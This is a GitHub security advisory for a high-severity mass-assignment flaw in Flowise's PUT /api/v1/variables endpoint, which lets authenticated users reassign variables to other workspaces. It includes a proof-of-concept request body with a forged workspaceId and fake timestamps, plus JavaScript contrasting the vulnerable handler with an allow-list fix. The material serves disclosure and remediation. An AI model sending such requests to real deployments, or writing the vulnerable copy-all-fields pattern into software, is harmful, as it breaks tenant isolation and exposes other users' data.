GHSA-6FW7-3Q8R-M5VJ

Vulnerability from github – Published: 2026-05-14 14:52 – Updated: 2026-06-09 13:09
Summary
FlowiseAI has Mass Assignment in Variable Update Endpoint that Allows Cross-Workspace Resource Reassignment
Details

Summary

A Mass Assignment vulnerability exists in the variable update endpoint of FlowiseAI.

The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource.

Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces.

This behavior may break tenant isolation in multi-workspace environments.

Details

The endpoint responsible for updating variables:

PUT /api/v1/variables/{variableId}

accepts a JSON request body containing the variable definition.

However, the backend does not restrict which attributes can be modified by the client. As a result, user-controlled request bodies can include internal properties that should normally be controlled exclusively by the server.

Server-controlled fields that can be manipulated include:

  • workspaceId
  • createdDate
  • updatedDate

These fields appear to be directly mapped to the database entity without strict input validation or authorization checks.

For example, the following request body was accepted by the server:

{
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2016-03-06T18:00:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

The server accepted the attacker-controlled workspaceId and metadata fields and persisted them.

PoC

Request

PUT /api/v1/variables/<VARIABLE_ID>
Content-Type: application/json

{
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2016-03-06T18:00:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

Response

{
  "id": "0a2b9f61-4a97-4ff8-b80d-00275ed18674",
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2026-03-06T18:05:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

This confirms that the backend accepts and persists attacker-controlled internal properties.

Impact

This vulnerability allows authenticated users to manipulate internal attributes of variable resources.

Possible impacts include:

  1. Cross-workspace reassignment of variables (workspaceId)
  2. Unauthorized modification of metadata (createdDate, updatedDate)
  3. Potential tenant isolation bypass in multi-workspace deployments

In multi-tenant environments, this may allow an attacker to move variables between workspaces without authorization.
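The allow-list fix that removes this class of bug, as an added illustration that is not Flowise's own code: an in-memory model of the variable update handler showing the mass-assignment pattern (every body property copied onto the entity) beside a hardened version that checks the caller owns the variable's workspace, takes only `name`, `value` and `type` from the body, and sets `updatedDate` server-side. The store, the `caller` object, the variable id `var-1` and the handler names are invented; the request body is constructed to mirror the advisory's PoC.

```javascript
// Added illustration (not Flowise code): in-memory model of the variable
// update endpoint. Store, ids, caller shape and handler names are invented.

// Constructed in-memory variable store keyed by variable id.
const store = new Map();

function seedStore() {
  store.clear();
  store.set("var-1", {
    id: "var-1",
    name: "original",
    value: "secret",
    type: "static",
    workspaceId: "workspace-A",
    createdDate: "2026-01-01T00:00:00.000Z",
    updatedDate: "2026-01-01T00:00:00.000Z",
  });
}

// Constructed request body mirroring the advisory's PoC: server-controlled
// fields are sent alongside the legitimate ones.
const maliciousBody = {
  name: "aaa",
  value: "bbbe",
  type: "static",
  createdDate: "2016-03-06T17:59:30.000Z",
  updatedDate: "2016-03-06T18:00:17.000Z",
  workspaceId: "11111111-2222-3333-4444-555555555555",
};

// Vulnerable pattern (CWE-915): every body property is copied onto the
// entity, so workspaceId and the timestamps become client-controlled.
function updateVariableVulnerable(variableId, body) {
  const entity = store.get(variableId);
  if (!entity) return { status: 404 };
  Object.assign(entity, body);
  return { status: 200, body: entity };
}

// Fields a client is allowed to change; everything else is dropped.
const CLIENT_MUTABLE_FIELDS = ["name", "value", "type"];

// Hardened version: (1) the caller must belong to the variable's workspace
// (CWE-639), (2) only allow-listed fields are read from the body (CWE-915),
// (3) updatedDate is set by the server; createdDate and workspaceId never
// change through this endpoint.
function updateVariableHardened(variableId, body, caller, now = new Date()) {
  const entity = store.get(variableId);
  if (!entity) return { status: 404 };
  if (entity.workspaceId !== caller.workspaceId) {
    // 404 rather than 403 so the response does not confirm the id exists.
    return { status: 404 };
  }
  const update = {};
  for (const field of CLIENT_MUTABLE_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(body, field)) {
      update[field] = body[field];
    }
  }
  const updated = { ...entity, ...update, updatedDate: now.toISOString() };
  store.set(variableId, updated);
  return { status: 200, body: updated };
}

// Body properties that were discarded. Logging these is a cheap detection
// signal: a well-behaved client never sends workspaceId or timestamps.
function rejectedFields(body) {
  return Object.keys(body).filter((k) => !CLIENT_MUTABLE_FIELDS.includes(k));
}
```

Sending the PoC body through the vulnerable handler moves the variable to the attacker-chosen workspace; through the hardened handler it keeps `workspace-A` and its original `createdDate`, and the same request from a caller in another workspace is refused before any field is touched. Note that the ownership check compares the stored entity's workspace, not a workspace id taken from the body.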


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42861"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-639",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T14:52:24Z",
    "nvd_published_at": "2026-06-08T16:16:39Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA Mass Assignment vulnerability exists in the variable update endpoint of FlowiseAI.\n\nThe endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource.\n\nDue to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces.\n\nThis behavior may break tenant isolation in multi-workspace environments.\n\n### Details\nThe endpoint responsible for updating variables:\n\n**PUT /api/v1/variables/{variableId}**\n\naccepts a JSON request body containing the variable definition.\n\nHowever, the backend does not restrict which attributes can be modified by the client. As a result, user-controlled request bodies can include internal properties that should normally be controlled exclusively by the server.\n\nServer-controlled fields that can be manipulated include:\n\n- workspaceId\n- createdDate\n- updatedDate\n\nThese fields appear to be directly mapped to the database entity without strict input validation or authorization checks.\n\nFor example, the following request body was accepted by the server:\n\n```json\n{\n  \"name\": \"aaa\",\n  \"value\": \"bbbe\",\n  \"type\": \"static\",\n  \"createdDate\": \"2016-03-06T17:59:30.000Z\",\n  \"updatedDate\": \"2016-03-06T18:00:17.000Z\",\n  \"workspaceId\": \"11111111-2222-3333-4444-555555555555\"\n}\n```\n\nThe server accepted the attacker-controlled workspaceId and metadata fields and persisted them.\n\n### PoC\n**Request**\n\n```http\nPUT /api/v1/variables/\u003cVARIABLE_ID\u003e\nContent-Type: application/json\n\n{\n  \"name\": \"aaa\",\n  \"value\": \"bbbe\",\n  \"type\": \"static\",\n  \"createdDate\": \"2016-03-06T17:59:30.000Z\",\n  \"updatedDate\": \"2016-03-06T18:00:17.000Z\",\n  \"workspaceId\": \"11111111-2222-3333-4444-555555555555\"\n}\n```\n\n**Response**\n\n```json\n{\n  \"id\": \"0a2b9f61-4a97-4ff8-b80d-00275ed18674\",\n  \"name\": \"aaa\",\n  \"value\": \"bbbe\",\n  \"type\": \"static\",\n  \"createdDate\": \"2016-03-06T17:59:30.000Z\",\n  \"updatedDate\": \"2026-03-06T18:05:17.000Z\",\n  \"workspaceId\": \"11111111-2222-3333-4444-555555555555\"\n}\n```\n\nThis confirms that the backend accepts and persists attacker-controlled internal properties.\n\n### Impact\nThis vulnerability allows authenticated users to manipulate internal attributes of variable resources.\n\nPossible impacts include:\n\n1. Cross-workspace reassignment of variables (workspaceId)\n2. Unauthorized modification of metadata (createdDate, updatedDate)\n3. Potential tenant isolation bypass in multi-workspace deployments\n\nIn multi-tenant environments, this may allow an attacker to move variables between workspaces without authorization.",
  "id": "GHSA-6fw7-3q8r-m5vj",
  "modified": "2026-06-09T13:09:53Z",
  "published": "2026-05-14T14:52:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6fw7-3q8r-m5vj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42861"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "FlowiseAI has Mass Assignment in Variable Update Endpoint that Allows Cross-Workspace Resource Reassignment"
}
